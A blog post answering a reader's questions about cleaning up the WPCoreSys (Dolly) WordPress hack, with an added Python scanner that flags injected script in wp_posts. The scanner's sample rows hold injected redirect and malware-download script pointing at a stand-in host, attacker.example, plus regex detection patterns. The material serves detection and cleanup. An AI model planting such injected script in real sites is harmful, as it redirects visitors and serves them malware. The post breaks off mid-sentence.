This is a revisit to one of my most popular posts, WPCoreSys (Dolly) Hack. A reader asked some follow-up questions which I think can be useful to other people who are going through the same WordPress hack.
I can’t thank you enough for your post on the WPCoreSys (Dolly) Hack. I’ve been chasing this problem for a few weeks on my WP site, but unable to get to the actual root cause. I’m far from a WP expert (which I’m sure has slowed me down), but I was able to delete the WPCoreSys directory from within the Plugins folder, and also delete the four entries from the wp_dolly_plugin_table (using phpmyadmin), but unable to figure out how to delete the table itself. I’ve also changed admin, cpanel and FTP passwords, and installed some security and audit plugins. Hopefully, all that’s enough to keep the hackers away from doing anything else.
Although your post was incredibly helpful, I do have two questions for you:
First, were you ever able to figure out what the hackers were doing? I saw that they created entries in my WP_Posts table, and based on the content it looked like it was somehow related to downloading pirated files. But I'm not exactly sure how my little WP site figured into it all.
Secondly, and more importantly, the code changes in your post were way above my technical skill. So I was wondering if you were aware of any sort of plugin or other utility that could do the necessary clean-up work for this hack?
I do have one question you may be able to help with: live traffic shows people going to URLs like:
- http://www.mywebsiteexample.com/?La-saga-McJames–Tome-2—-Dans-le-lit-d-un-guerrier.pdf
- http://www.mywebsiteexample.com/?Revue-technique-automobile—n-253—mai-1967—Simca-1500-1501—Renault-8-Gordini.pdf
- http://www.mywebsiteexample.com/?Photoshop-Elements-11-pour-les-photographes.pdf
…and other very curious/odd names. Those PDFs don't exist on my site, so WP just takes the user to the home page. Do you have any thoughts about those names, and what might be generating that traffic? I'm wondering if it's an attempt to hack, and a result of the hacking.
Once again, I’m grateful that I found your post.
My response:
You did almost everything needed; if you follow the instructions in my blog post you should be fine. Since the cleanup, that site hasn't been hit with another malware attack.
The attack is a typical SQL injection attack that injects XSS scripts into the website. The XSS script's payload does the following:
- Puts JavaScript code into the pages of your website that triggers a redirect, upon arrival, to a website of their choice.
- Puts content and website links of their choice into your website.
- Puts JavaScript code that triggers a popup box or download dialog boxes to download malware, or places tracking cookies onto your visitors' computers.
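As an added illustration (my own code, not part of the original post or of any WordPress plugin), here is a small Python scanner that flags post_content rows carrying the payload behaviours listed above, plus a check for the odd `?Some-Title.pdf` URLs the reader quoted from his traffic log. The indicator patterns and the sample rows are constructed assumptions, not data from the hacked site.

```python
import re
from html import unescape

# Indicators for the payload behaviours in the post: redirect on arrival, injected markup, popups/downloads.
INDICATORS = {
    "redirect": re.compile(
        r"(window|document|top|self)\.location(\.href)?\s*=|location\.replace\(|"
        r"<meta[^>]+http-equiv=[\"']?refresh", re.I),
    "popup_or_download": re.compile(
        r"\b(alert|confirm|prompt|window\.open)\s*\(|\.(exe|scr|zip)[\"']", re.I),
    "script_tag": re.compile(r"<script\b[^>]*>", re.I),
    "hidden_iframe": re.compile(
        r"<iframe\b[^>]*((width|height)\s*=\s*[\"']?0|display\s*:\s*none)", re.I),
    "encoded_payload": re.compile(r"\b(eval|unescape|String\.fromCharCode)\s*\(", re.I),
}

# Requests like /?Some-Title.pdf: a query string that is only a file name, with no key=value pair.
PROBE_QUERY = re.compile(r"\?[^=&]+\.pdf$", re.I)

def scan_content(content):
    """Return the indicator names that fire on one post_content value."""
    text = unescape(content)  # injected markup is often stored entity-encoded
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_posts(rows):
    """rows: iterable of (ID, post_content) pulled from wp_posts; returns {ID: [indicators]} for hits."""
    hits = {}
    for post_id, content in rows:
        found = scan_content(content)
        if found:
            hits[post_id] = found
    return hits

def is_probe_url(url):
    """True when the URL matches the bot probe pattern, so it can be counted or rate-limited."""
    return PROBE_QUERY.search(url) is not None

# Constructed sample rows (assumed shapes of injected content); not data from the hacked site.
SAMPLE_ROWS = [
    (1, "<p>Welcome to my site about hiking.</p>"),
    (2, '<p>Photos</p><script>window.location="http://attacker.example/go";</script>'),
    (3, '<script>alert("Update required"); window.open("http://attacker.example/dl.exe");</script>'),
    (4, "&lt;script&gt;eval(unescape('%61%6c%65%72%74'))&lt;/script&gt;"),
]

if __name__ == "__main__":
    for pid, names in scan_posts(SAMPLE_ROWS).items():
        print(f"post {pid}: {', '.join(names)}")
```

Run it against `SELECT ID, post_content FROM wp_posts` output to get a list of post IDs to review by hand; the indicators are heuristics, so treat hits as candidates rather than proof.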
As for the random URL strings you're seeing, those are bots querying for hidden pages. They are a nuisance and cause extra processing for your server. I recommend a plugin called